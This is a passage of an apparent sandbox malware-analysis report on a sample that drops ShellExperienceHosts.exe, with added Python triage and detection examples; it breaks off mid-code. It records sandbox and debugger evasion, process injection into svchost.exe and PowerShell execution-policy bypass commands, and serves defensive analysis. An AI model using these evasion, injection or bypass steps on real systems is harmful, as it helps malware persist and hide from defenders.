Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (3 identical entries)
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Window / User API: threadDelayed 5923
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4589
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8358
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1292
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\backup.dll
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Dropped PE file which has not been started: C:\Users\Public\Bulete\wps_lid.lid-s8HDMqE8a6Xy.exe
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | API coverage: 7.7 %
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe TID: 4180 | Thread sleep time: -73000s >= -30000s
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe TID: 1016 | Thread sleep time: -63000s >= -30000s
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe TID: 3020 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe TID: 4592 | Thread sleep time: -59230s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 5472 | Thread sleep count: 253 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3428 | Thread sleep count: 4589 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5224 | Thread sleep count: 229 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3396 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4504 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6364 | Thread sleep count: 8358 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2792 | Thread sleep count: 1292 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6584 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 3964 | Thread sleep count: 269 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 4092 | Thread sleep count: 268 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 6428 | Thread sleep count: 193 > 30
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (2 identical entries)
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe | Last function: Thread delayed (2 identical entries)
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Thread sleep count: Count: 5923 delay: -10
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_6C7BC637 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_033280F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_03325430 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Thread delayed: delay time: 73000
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (3 identical entries)
Source: S1Rv3ioghk.exe | Binary or memory string: Hyper-V enabled!UEFI Secure Variables (VbsPolicy)
Source: powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: S1Rv3ioghk.exe | Binary or memory string: Hyper-V not available
Source: ShellExperienceHosts.exe, 00000003.00000002.3542074440.0000000000712000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: S1Rv3ioghk.exe | Binary or memory string: Hyper-V Hypervisor running: %i
Source: S1Rv3ioghk.exe | Binary or memory string: XThe system has not the required hardware support (SLAT, VMX, ...) to run the Hypervisor.#Hyper-V hypervisor is not running.
Source: powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
Source: S1Rv3ioghk.exe | Binary or memory string: Hyper-V not started
Source: ShellExperienceHosts.exe, 00000003.00000002.3542074440.0000000000712000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | API call chain: ExitProcess graph end node graph_3-126524
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Process information queried: ProcessInformation
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_0332F00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_6C6E2FB6 OutputDebugStringA,GetLastError
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_0333054D VirtualProtect ?,-00000001,00000104,?
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_03327490 wsprintfW,LoadLibraryW,GetProcAddress,MultiByteToWideChar,swprintf,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_02230AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_031A00CD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_03326790 wsprintfW,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,LookupAccountSidW,GetLastError,GetProcessHeap,HeapFree
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug (4 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (2 identical entries)
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_0332DF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_0332F00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_03331F67 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_6C7A0526 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_6C85C288 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_6C7CD34B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_10008587 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_10006815 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_022367EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
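The sleep, sleep-loop, IsDebuggerPresent and fs:[30h] (PEB) entries above are what an analyst weighs by hand when deciding whether a sample is stalling for the sandbox or checking for a debugger. The Python below is an added example, not part of the Joe Sandbox report, of Joe Security's tooling or of the sample: it parses behaviour lines written in the report's own format and turns them into deduplicated, weighted findings. The SAMPLE_LINES are constructed from the report's entries (API lists shortened); the severity weights, the assumption that image paths contain no spaces, and the reading of 922337203685477 as Int64.MaxValue in 100 ns ticks divided by 10000 (the largest relative timeout, i.e. an unbounded wait) are assumptions made for this example, while the 30000 ms and 30-call thresholds mirror the report's own rules.

```python
"""Triage of Joe Sandbox style behaviour lines for sandbox- and debugger-evasion signals."""
import re
from dataclasses import dataclass

# Thresholds mirror the report's own rules ("-30000s >= -30000s", "253 > 30").
LONG_SLEEP_MS = 30_000
MANY_SLEEPS = 30
# Int64.MaxValue in 100 ns ticks divided by 10000 == 922337203685477 ms: the largest
# relative timeout a wait can take, i.e. an unbounded wait rather than a chosen delay.
INFINITE_WAIT_MS = 9_223_372_036_854_775_807 // 10_000

ANTI_DEBUG_APIS = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent",
                   "OutputDebugStringA", "NtQueryInformationProcess"}
INJECTION_CHAIN = ("OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread")

SOURCE = re.compile(r"^Source: (\S+?\.exe)")          # assumes no spaces in the image path
SLEEP_TIME = re.compile(r"Thread sleep time: -?(\d+)s")
SLEEP_COUNT = re.compile(r"Thread sleep count: (\d+)")
CODE_FUNC = re.compile(r"Code function: (\S+) (.+)$")
PEB_ACCESS = re.compile(r"fs:\[0*30h\]", re.IGNORECASE)  # TEB->PEB, e.g. BeingDebugged

@dataclass
class Finding:
    source: str
    kind: str
    detail: str
    weight: int  # assumed severity weights for this example

def parse_line(line):
    """Map one report line to a Finding, or None when it carries no evasion signal."""
    m = SOURCE.match(line)
    source = m.group(1) if m else "?"
    if m := SLEEP_TIME.search(line):
        ms = int(m.group(1))
        if ms >= INFINITE_WAIT_MS:
            # PowerShell host threads show this for ordinary blocking waits: weak on its own.
            return Finding(source, "infinite-wait", f"{ms} ms", 1)
        return Finding(source, "long-sleep", f"{ms} ms", 3) if ms >= LONG_SLEEP_MS else None
    if m := SLEEP_COUNT.search(line):
        n = int(m.group(1))
        return Finding(source, "sleep-loop", f"{n} calls", 2) if n > MANY_SLEEPS else None
    if m := CODE_FUNC.search(line):
        func, body = m.groups()
        apis = {a.strip() for a in body.split(",")}
        if all(api in apis for api in INJECTION_CHAIN):
            return Finding(source, "remote-injection", f"{func}: " + " -> ".join(INJECTION_CHAIN), 5)
        if PEB_ACCESS.search(body):
            return Finding(source, "peb-access", f"{func}: reads fs:[30h]", 3)
        hits = sorted(ANTI_DEBUG_APIS & apis)
        return Finding(source, "anti-debug", f"{func}: {', '.join(hits)}", 3) if hits else None
    if "NOOPENFILEERRORBOX" in line:
        return Finding(source, "error-mode", "hard error mode NOOPENFILEERRORBOX (SetErrorMode)", 1)
    return None

def triage(lines):
    """Deduplicate (the report repeats one SetErrorMode entry over 100 times) and score."""
    unique, seen = [], set()
    for f in filter(None, map(parse_line, lines)):
        key = (f.source, f.kind, f.detail)
        if key not in seen:
            seen.add(key)
            unique.append(f)
    by_source = {}
    for f in unique:
        by_source.setdefault(f.source, []).append(f.kind)
    return {"score": sum(f.weight for f in unique), "findings": unique, "by_source": by_source}

# Constructed sample, copied from the report's entries with the API lists shortened.
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
RAT = r"C:\Users\Public\Bulete\program\ShellExperienceHosts.exe"
SAMPLE_LINES = [
    f"Source: {PS} TID: 3396 Thread sleep time: -922337203685477s >= -30000s",
    f"Source: {RAT} TID: 4180 Thread sleep time: -73000s >= -30000s",
    f"Source: {RAT} TID: 3020 Thread sleep time: -30000s >= -30000s",
    r"Source: C:\Windows\SysWOW64\timeout.exe TID: 5472 Thread sleep count: 253 > 30",
    f"Source: {RAT} Code function: 3_2_0332F00A IsDebuggerPresent,SetUnhandledExceptionFilter,"
    "UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess",
    f"Source: {RAT} Code function: 3_2_02230AE4 mov eax, dword ptr fs:[00000030h]",
    f"Source: {RAT} Code function: 3_2_033277E0 Sleep,OpenProcess,VirtualAllocEx,WriteProcessMemory,"
    "VirtualProtectEx,CreateRemoteThread,ResumeThread",
    f"Source: {PS} Process information set: NOOPENFILEERRORBOX",
    f"Source: {PS} Process information set: NOOPENFILEERRORBOX",
    f"Source: {RAT} Queries volume information: C:\\ VolumeInformation",
]

if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    print("score:", result["score"])
    for f in result["findings"]:
        image = f.source.rsplit("\\", 1)[-1]
        print(f"[{f.weight}] {f.kind:16} {image}: {f.detail}")
```

Deduplication is keyed on source, kind and detail, so the 106 repeated SetErrorMode entries count once while each distinct sleep length from the dropped binary still counts; the infinite wait is scored low deliberately because it comes from powershell.exe host threads, not from ShellExperienceHosts.exe.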

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_033277E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread (2 identical entries)
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_033277E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, referenced path: Windows\SysWOW64\svchost.exe
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_033277E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, referenced path: Windows\System32\svchost.exe
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak (the tasklist / findstr / timeout sequence above is recorded 4 times)
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
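The process creations above (cmd.exe starting ShellExperienceHosts.exe from C:\Users\Public, a tasklist / findstr / timeout polling loop that keeps checking whether the binary is still running, and two PowerShell execution-policy changes) are exactly what endpoint process-creation telemetry records. The Python below is an added example, not code from the report, from Joe Security or from the sample: it runs three detections, corresponding to the report's "Execution from Suspicious Folder" / "Parent in Public Folder" Sigma hits and to "Bypasses PowerShell execution policy", over constructed Sysmon-style Event ID 1 records modelled on the report's command lines. The image paths and command lines are copied from the report; the process IDs, the ParentProcessId field, the Sysmon-like field names and the single benign control event are assumptions made for this example.

```python
"""Detections over Sysmon-style process-creation events, modelled on the report's process tree."""
import re

# Image paths and command lines are copied from the report; PIDs, the ParentProcessId
# field and the benign control event are constructed for this example.
CMD = r"C:\Windows\SysWOW64\cmd.exe"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
RAT = r"C:\Users\Public\Bulete\program\ShellExperienceHosts.exe"

def event(image, parent, ppid, cmdline):
    """Minimal Sysmon Event ID 1 style record (field names assumed)."""
    return {"Image": image, "ParentImage": parent, "ParentProcessId": ppid, "CommandLine": cmdline}

EVENTS = [
    event(CMD, r"C:\Users\user\Desktop\S1Rv3ioghk.exe", 1000, r'"C:\Windows\System32\cmd.exe" /c start ' + RAT),
    event(RAT, CMD, 1100, RAT),
]
for _ in range(4):  # the report records this polling cycle four times
    EVENTS += [
        event(r"C:\Windows\SysWOW64\tasklist.exe", CMD, 1200, 'tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"'),
        event(r"C:\Windows\SysWOW64\findstr.exe", CMD, 1200, 'findstr /I "ShellExperienceHosts.exe"'),
        event(r"C:\Windows\SysWOW64\timeout.exe", CMD, 1200, "timeout /t 30 /nobreak"),
    ]
EVENTS += [
    event(PS, CMD, 1200, 'powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"'),
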